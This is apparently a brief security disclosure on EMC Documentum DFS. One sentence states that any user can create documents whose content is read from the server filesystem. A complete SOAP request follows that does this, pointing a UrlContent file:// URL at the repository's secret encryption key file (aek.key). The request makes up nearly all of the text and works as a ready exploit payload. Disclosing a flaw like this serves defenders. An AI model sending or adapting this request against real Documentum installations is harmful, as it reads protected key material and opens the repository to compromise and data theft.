documentum security vulnerabilities: DFS

Any user is able to create document object with content based on DFS filesystem:

<?xml version="1.0" ?>
<S:Envelope xmlns:S="http://schemas.xmlsoap.org/soap/envelope/">
    <S:Header>
        <ServiceContext xmlns="http://context.core.datamodel.fs.documentum.emc.com/"
                        xmlns:ns3="http://profiles.core.datamodel.fs.documentum.emc.com/"
                        xmlns:ns4="http://query.core.datamodel.fs.documentum.emc.com/">
            <Identities xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" 
                        password="password" repositoryName="repo"
                        userName="user" xsi:type="RepositoryIdentity"
             />
        </ServiceContext>
    </S:Header>
    <S:Body>
        <ns8:create xmlns:ns3="http://core.datamodel.fs.documentum.emc.com/"
                    xmlns:ns4="http://content.core.datamodel.fs.documentum.emc.com/"
                    xmlns:ns8="http://core.services.fs.documentum.emc.com/">
            <dataPackage>
                <ns3:DataObjects type="dm_document">
                    <ns3:Identity repositoryName="repo" valueType="UNDEFINED"/>
                    <ns3:Contents xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" 
                            xsi:type="ns4:UrlContent"
                            url="file:///u01/documentum/dba/secure/aek.key" 
                            pageNumber="0" format="binary">
                        <ns4:renditionType xsi:nil="true"/>
                        <ns4:intentModifier>SET</ns4:intentModifier>
                    </ns3:Contents>
                </ns3:DataObjects>
            </dataPackage>
        </ns8:create>
    </S:Body>
</S:Envelope>